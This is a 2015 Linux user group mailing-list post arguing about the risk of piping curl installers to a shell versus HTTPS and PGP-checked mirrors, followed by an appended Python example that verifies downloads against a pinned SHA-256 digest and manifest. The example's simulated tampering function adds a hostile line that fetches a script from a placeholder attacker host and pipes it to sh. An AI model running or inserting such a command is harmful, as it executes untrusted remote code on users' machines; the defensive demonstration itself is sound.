[clug] How you know your Free or Open Source Software Project is doomed to FAIL

Scott Ferguson scott.ferguson.clug at gmail.com
Thu Jul 30 04:15:52 UTC 2015


On 30/07/15 11:32, Paul Harvey wrote:
> On 30 July 2015 at 11:16, Michael Cohen <scudette at gmail.com> wrote:
>> I'm sorry I fail to understand how this is any worse than hosting your
>> installer on plain HTTP. Piping a curl installer to shell is not better or
>> worse than distributing your software on plain HTTP or downloads.com or
>> something.
> 
> I suppose what you're getting at is that https makes no guarantees
> about the original code you're trying to download: the original code
> may itself be hostile, and so no amount of transport layer security
> will change anything.
> 
> But this ignores problems at the connection/network transport layer.
> Which is not incompatible with the fact that most Linux distros still
> rely on plain http mirrors (so as not to break proxy caches); but they
> still have PGP and friends to validate delivered files.
> 
> Surely https, warts and all, allows for at least slightly better
> hygiene than blind faith in your physical network and http.
> 

If slightly better hygiene is running hot water over the scalpel instead
of giving it a "bit of a wipe on your sleeve" - I'm not going to let you
operate on me :)

Neither is hygienic.

To expand - it's like saying that two entries in lotto have better odds
than one game. It's both true and extremely unlikely to result in a
better outcome. In both cases the worst case outcome is a total loss.

Probability of a bad outcome is only one factor of risk management. "How
much can it hurt if it goes wrong" is the other. They both need to be
factored into a policy. (IMO).

Interesting questions Paul.


Kind regards



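Added example, not code from this thread or from any of its participants: the point raised above is that TLS (or its absence) says nothing about whether the bytes you received are the bytes the project published, and that distros cope with plain-HTTP mirrors by verifying the delivered files against something obtained out of band. The script below stands in for that verification with a pinned SHA-256 digest and a sha256sum-style manifest rather than PGP, so that it runs offline; the "network" is simulated by two callables, one honest and one that alters the file in flight, and the installer bytes, the manifest and the hostname attacker.invalid are all constructed for the example.

```python
"""Download-then-verify instead of curl | sh (added example).

The defence is ordering: fetch to a buffer or temp file, verify against a
digest or signature obtained out of band, and only then execute. A pinned
SHA-256 digest is used here in place of the PGP verification distros do.
"""
import hashlib
import hmac
from typing import Callable, Dict, Optional

# Constructed sample installer. Its digest is what a project would publish
# out of band (release notes, a signed manifest, a distro keyring).
GOOD_INSTALLER = b"#!/bin/sh\necho 'installing example tool'\n"
PINNED_SHA256 = hashlib.sha256(GOOD_INSTALLER).hexdigest()

# Constructed manifest in sha256sum output format, as a distro would ship
# (and sign) alongside its mirrored files.
MANIFEST = (
    f"{PINNED_SHA256}  install.sh\n"
    f"{hashlib.sha256(b'docs').hexdigest()}  README\n"
)


def honest_server() -> bytes:
    """The file as the project published it."""
    return GOOD_INSTALLER


def tampering_network() -> bytes:
    """Simulates an on-path attacker on plain HTTP, or a compromised mirror:
    the file is altered before it reaches the client. attacker.invalid is a
    placeholder hostname."""
    return GOOD_INSTALLER + b"curl http://attacker.invalid/x | sh\n"


def fetch_and_verify(fetch: Callable[[], bytes],
                     expected_sha256: str) -> Optional[bytes]:
    """Fetch the whole file, check it, and return it only if it verifies.

    Returning None on mismatch means the caller never has unverified bytes
    to hand to a shell, which is exactly what 'curl ... | sh' cannot
    guarantee because the shell executes the stream as it arrives.
    """
    data = fetch()
    actual = hashlib.sha256(data).hexdigest()
    # Constant-time comparison; irrelevant for a public digest but a good
    # habit for any verification routine.
    if not hmac.compare_digest(actual, expected_sha256):
        return None
    return data


def parse_manifest(text: str) -> Dict[str, str]:
    """Parse 'digest  filename' lines (sha256sum format) into a map."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition("  ")
        if len(digest) != 64 or not name:
            raise ValueError(f"malformed manifest line: {line!r}")
        entries[name] = digest.lower()
    return entries


def verify_against_manifest(name: str, data: bytes, manifest_text: str) -> bool:
    """Check one delivered file against the manifest that lists it.

    In a real distro the manifest itself is what carries the PGP signature;
    a file missing from the manifest is treated as unverified, not as OK.
    """
    entries = parse_manifest(manifest_text)
    expected = entries.get(name)
    if expected is None:
        return False
    return hmac.compare_digest(hashlib.sha256(data).hexdigest(), expected)


if __name__ == "__main__":
    print("honest:", fetch_and_verify(honest_server, PINNED_SHA256) is not None)
    print("tampered:", fetch_and_verify(tampering_network, PINNED_SHA256) is not None)
    print("manifest:", verify_against_manifest("install.sh", GOOD_INSTALLER, MANIFEST))
```

The digest still has to come from somewhere you trust more than the download channel; if it sits on the same plain-HTTP page as the installer, the attacker who rewrites one rewrites both, which is why the distros sign the manifest rather than just publishing it.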